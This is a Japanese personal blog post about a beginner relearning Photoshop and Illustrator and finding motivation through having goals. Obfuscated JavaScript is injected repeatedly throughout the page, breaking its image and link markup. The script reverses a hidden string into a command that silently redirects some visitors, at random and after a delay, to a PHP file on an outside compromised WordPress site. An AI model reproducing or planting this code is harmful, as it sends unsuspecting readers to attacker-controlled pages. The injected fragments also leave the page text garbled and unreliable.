Sumirexxx

今日もiPhone片手に出かけます

[š]Adobe超初心者です。PhotoshopやIllustratorはじめました(4年越し2度目)

MacBook Air

Adobe photoshop Illustrator$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ width=”249″ height=”144″>

こんにちは、すみれ(@sumire20120524)です。

Photoshopで遊ぶのがちょー楽しいです。

2012年から持ってたのに、全然手つかずのまま…(えっ、もう4年も経っちゃったの?)

本を買ってはみたものの、当時は「やりたい!」って気持ちが今よりうすくて、まったく覚えられず放置。

ちなみに買った時の記事は書いていました。

$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}design_web-premium/” target=”_blank”>$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ src=”http://capture.heartrails.com/150×130/shadow?http://sumirexxx.com/2013/02/01/adobe_cs6design_web-premium/” alt=”” width=”150″ height=”130″ />$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}design_web-premium/” target=”_blank”>社会人の私が Adobe CS6 Design&Web Premium アカデミック版を買って、オンライン受講生になった! | Sumirexxx$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}design_web-premium/” target=”_blank”>$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ src=”http://b.hatena.ne.jp/entry/image/http://sumirexxx.com/2013/02/01/adobe_cs6design_web-premium/” alt=”” />

当時の記事がこれしかないということは、その後何も音沙汰なしだったということなのです。

で、ブログとかWebとかに興味を持ち出した頃から約3、4年経ってやっと、本腰入れてPhotoshopとかIllustratorとかやってみたい!とココロから思えるようになったのです。

ムダ金にならなくてよかった〜。

Adobeという名前しか知らない

そもそも私がAdobeに興味を持ったのは、ハタチを過ぎてからのことです。それまでは存在くらいは知っていたかな〜?という程度。

まずはAdobeとかいうものをこの手に収めたかったので、上のリンクにもあるように安く買える方法をかたっぱしから探しました。(何ができるかもよくわかってないのに)

いまの自分から見ると「もーちょっと考えてから買ってよ。」って感じですが、いまだったら当時のようにすんなり買えないので、やっぱり買っておいて良かったなぁと思います。

で、何するの?

Adobeを買ったはいいけどホントに何をしたらいいかワカラナイ状態。

なんかかっこよさそうなものを作れるっぽいと思ったものの、0ベースでは何も生まれないんですよねぇ…。

参考書を探しに行っても、いわゆる「Tips」的な参考書しか見つけることができなかったですね。何を作りたいかわかんないけどとにかく使ってみたかったって感じだったので。なんてゆーか、何にもないのがすっごいさみしかった。笑

で、「初心者のためのPhotoshop☆」とか読んでみると「ダサッ!」とか思ってしまうこともあって(初心者向けだから基本的なお作法を教えてくれているだけなのに)

えーなんか思ってたのとちがーう。がっかりー。しょぼん。みたいな感じ。

当時は「それを使って何がしたいか」がなかったから、楽しむことができなかったんだなぁと思います。

それに比べるといまは、「もしかしたらブログに使えるかもしれない!」とか「頑張って覚えたら仕事で使えるかもしれない!」とか「こういうのを作りたい」というゴールをイメージできるから、また使う気になったのかもしれません。

すごいたのしー!

数年ぶりにやってみたら、これが楽しくて楽しくて!

4年前はなんだったんだろう?って不思議でなりません。

とはいえ、思い描いていたようないわゆる「かっこいいデザイン」的なやつはまだ全然できません。IllustratorとPhotoshopやってるんですけど(いまはどちらかというとPhotoshop)、そもそもこの2つの切り分けも「写真とお絵描きのちがいだよね?」ってくらいにしか知りませんでした。(いまはもうちょっと知ってる。つもり。)

でも、すごくたのしい。

知らないことを知っていく過程が楽しすぎて、何時間でもやっていたい。そういうわけにもいかないから限られた時間で超集中できる。ってゆう好循環。

でもこういう”何かを作る”ってゆうのは、一人だとなぁなぁになっちゃうところがあって。

あくまでも自分にとっては、仕事だったり誰かに見てもらえたりしないと、続かないっぽい分野かなと感じています。

ひとりでやってるのは楽しいけど、それだけだと「で?」って感じになるから。笑

何も知らないからこそ、楽しみ倍増

変にかじってたら、「ここは知ってるし飛ばそう…」と効率重視で進めていくと思うんですよね。

わざわざ知ってることからやり直す必要はないし。

今回の場合は、”そのとき”がくるまでのお楽しみ♡にとっといたことが、結果的には楽しみながらじっくりがっつり勉強出来てるって感じです。

まとめ

何かを作るときって、ある程度「仕事で必要だから」とか「専門行って課題出るから」とか『目的』あるほうが進めやすいんだな〜と感じました。

本当に何にもないところから新しいことを覚えようと思うと、何から手をつけていいかわからない。ゴールがないから。

だから、初歩的な練習段階で「このベジェ線の練習で、いったい何ができるんだろう?ほんとにできるようになるのかな?これじゃつまんないな」って不安になっちゃうところもあると思うんです。(というか、あった)

だから、もしかして私と同じように「始めたいけど目的が…」みたいな人にも読んでもらえるような、その辺を、初心者目線で書きたい!とさっき思いました。

またひとつ楽しみができました☆

この記事をシェアする

<